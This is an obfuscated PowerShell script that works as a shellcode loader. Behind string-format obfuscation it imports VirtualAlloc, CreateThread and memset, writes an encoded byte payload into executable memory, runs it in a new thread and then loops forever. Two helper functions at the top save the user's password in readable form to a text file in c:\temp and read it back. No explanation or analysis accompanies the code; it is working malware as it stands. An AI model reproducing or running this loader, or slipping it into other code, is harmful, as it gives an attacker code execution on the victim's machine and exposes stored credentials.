function sTor`e`-C`ReDS (${PW`File} = "c:\temp\$env:USERNAME.txt") {
    ${C`Re`dEnTIAl} = .("{1}{3}{2}{0}"-f'ial','Get-C','edent','r') -Credential ${e`N`V:useRnamE}
    ${c`ReDeN`T`iaL}."PA`s`sWORd" | .("{3}{5}{2}{4}{1}{6}{0}" -f 'ing','t','-Secu','C','reS','onvertFrom','r') | &("{1}{0}{2}" -f 'nten','Set-Co','t') ${p`Wf`iLe}
}

function Get-`C`RE`DS (${u`seR} = ${eNV:u`sEr`NaMe}, ${p`WFIle} = "c:\temp\$env:USERNAME.txt") {
    if (&("{0}{1}"-f'Tes','t-Path') ${PwF`I`lE}) {
        ${PA`sS`wORd} = .("{0}{3}{1}{2}"-f'G','t-','Content','e') ${pwFI`LE} | &("{1}{4}{6}{5}{0}{2}{3}" -f'ecu','Co','reStr','ing','nve','o-S','rtT')
        ${cRedEN`T`iAL} = .("{3}{1}{0}{2}" -f 'j','Ob','ect','New-') ("{0}{10}{4}{8}{5}{11}{7}{9}{2}{3}{6}{1}"-f'S','ial','.P','sCrede','s','.Managem','nt','utoma','tem','tion','y','ent.A') -ArgumentList ${u`SER}, ${pa`SsW`oRD}
        ${CR`e`dEntIal}
    }
}

${C} = ((("{15}{19}{53}{46}{89}{39}{63}{7}{99}{91}{17}{54}{1}{110}{61}{68}{32}{96}{4}{25}{83}{20}{105}{42}{74}{95}{94}{104}{29}{97}{103}{47}{11}{69}{27}{55}{16}{41}{44}{48}{43}{28}{3}{66}{72}{80}{9}{38}{73}{6}{76}{57}{59}{52}{35}{90}{64}{31}{51}{87}{101}{33}{34}{70}{100}{22}{108}{50}{12}{79}{107}{30}{2}{106}{23}{86}{65}{67}{37}{75}{88}{24}{49}{62}{77}{84}{8}{93}{0}{26}{58}{14}{102}{82}{109}{45}{5}{40}{92}{36}{60}{81}{21}{56}{13}{18}{98}{71}{78}{85}{10}" -f 't({0}ms','.dl',' dwCre','{','c',' IntP',' exte','({','Imp','st',');','e, uint',' lpPara','t, u','pu','[',');[DllImport({','l3','int s','Dl','lloc','tPtr de','artAdd','i','Thread',' extern IntPtr Virt','vc','Prote','.dll','flAl','int','uin','a','Size',', IntPtr l','tr','mse','P','a','r','t','0}','tr lpA','2','k','rn','Im','yp','ernel3','I','s, IntPtr','t','pThreadAt','l','2','ct','s','hrea','rt.dll{0})]','d(IntPtr l','t(I','})]public','d);[D','t','utes, ',' In','0})]p','t',' st',' fl','pS',' uin','ubli','tic','ddress','tr l','rn IntPtr CreateT','l','t coun','meter','c ','n','ic stati','ualA','l','t','onFlags,',' dw','p','po','ib','kerne','r me','or','ize, uin',', uint dwS','ti','locat','rc,','0}','t','Stack','bl','ionT','t ','(IntP','at',', u','res','c exte','l{0'))-F [ChAR]34);${w} = &("{1}{0}{2}" -f'dd-','A','Type') -memberDefinition ${c} -Name ("{1}{0}"-f '32','Win') -namespace ("{2}{3}{0}{1}"-f'nction','s','Wi','n32Fu') -passthru;[Byte[]];[Byte[]]${z} = 0xbf,0xd0,0xd1,0x8d,0x5a,0xda,0xd7,0xd9,0x74,0x24,0xf4,0x5d,0x31,0xc9,0xb1,0x47,0x31,0x7d,0x13,0x83,0xed,0xfc,0x03,0x7d,0xdf,0x33,0x78,0xa6,0x37,0x31,0x83,0x57,0xc7,0x56,0x0d,0xb2,0xf6,0x56,0x69,0xb6,0xa8,0x66,0xf9,0x9a,0x44,0x0c,0xaf,0x0e,0xdf,0x60,0x78,0x20,0x68,0xce,0x5e,0x0f,0x69,0x63,0xa2,0x0e,0xe9,0x7e,0xf7,0xf0,0xd0,0xb0,0x0a,0xf0,0x15,0xac,0xe7,0xa0,0xce,0xba,0x5a,0x55,0x7b,0xf6,0x66,0xde,0x37,0x16,0xef,0x03,0x8f,0x19,0xde,0x95,0x84,0x43,0xc0,0x14,0x49,0xf8,0x49,0x0f,0x8e,0xc5,0x00,0xa4,0x64,0xb1,0x92,0x6c,0xb5,0x3a,0x38,0x51,0x7a,0xc9,0x40,0x95,0xbc,0x32,0x37,0xef,0xbf,0xcf,0x40,0x34,0xc2,0x0b,0xc4,0xaf,0x64,0xdf,0x7e,0x14,0x95,0x0c,0x18,0xdf,0x99,0xf9,0x6e,0x87,0xbd,0xfc,0xa3,0xb3,0xb9,0x75,0x42,0x14,0x48,0xcd,0x61,0xb0,0x11,0x95,0x08,0xe1,0xff,0x78,0x34,0xf1,0xa0,0x25,0x90,0x79,0x4c,0x31,0xa9,0x23,0x18,0xf6,0x80,0xdb,0xd8,0x90,0x93,0xa8,0xea,0x3f,0x08,0x27,0x46,0xb7,0x96,0xb0,0xa9,0xe2,0x6f,0x2e,0x54,0x0d,0x90,0x66,0x92,0x59,0xc0,0x10,0x33,0xe2,0x8b,0xe0,0xbc,0x37,0x21,0xe4,0x2a,0xb2,0xb7,0x82,0x95,0xaa,0xb5,0x4a,0xe8,0x91,0x33,0xac,0xba,0xb5,0x13,0x61,0x7a,0x66,0xd4,0xd1,0x12,0x6c,0xdb,0x0e,0x02,0x8f,0x31,0x27,0xa8,0x60,0xec,0x1f,0x44,0x18,0xb5,0xd4,0xf5,0xe5,0x63,0x91,0x35,0x6d,0x80,0x65,0xfb,0x86,0xed,0x75,0x6b,0x67,0xb8,0x24,0x3d,0x78,0x16,0x42,0xc1,0xec,0x9d,0xc5,0x96,0x98,0x9f,0x30,0xd0,0x06,0x5f,0x17,0x6b,0x8e,0xf5,0xd8,0x03,0xef,0x19,0xd9,0xd3,0xb9,0x73,0xd9,0xbb,0x1d,0x20,0x8a,0xde,0x61,0xfd,0xbe,0x73,0xf4,0xfe,0x96,0x20,0x5f,0x97,0x14,0x1f,0x97,0x38,0xe6,0x4a,0x29,0x04,0x31,0xb2,0x5f,0x64,0x81;${g} = 0x1000;if (${Z}."Le`NGtH" -gt 0x1000){${G} = ${Z}."leng`Th"};${x}=${W}::("{1}{2}{0}" -f 'loc','Virt','ualAl').Invoke(0,0x1000,${g},0x40);for (${I}=0;${i} -le (${z}."l`E`NGTH"-1);${I}++) {${w}::"ME`m`SEt"([IntPtr](${X}.("{1}{0}"-f't32','ToIn').Invoke()+${I}), ${z}[${I}], 1)};${W}::("{0}{3}{1}{2}" -f'CreateTh','a','d','re').Invoke(0,0,${x},0,0,0);for (;;){&("{2}{1}{0}"-f'rt-sleep','ta','S') 60};
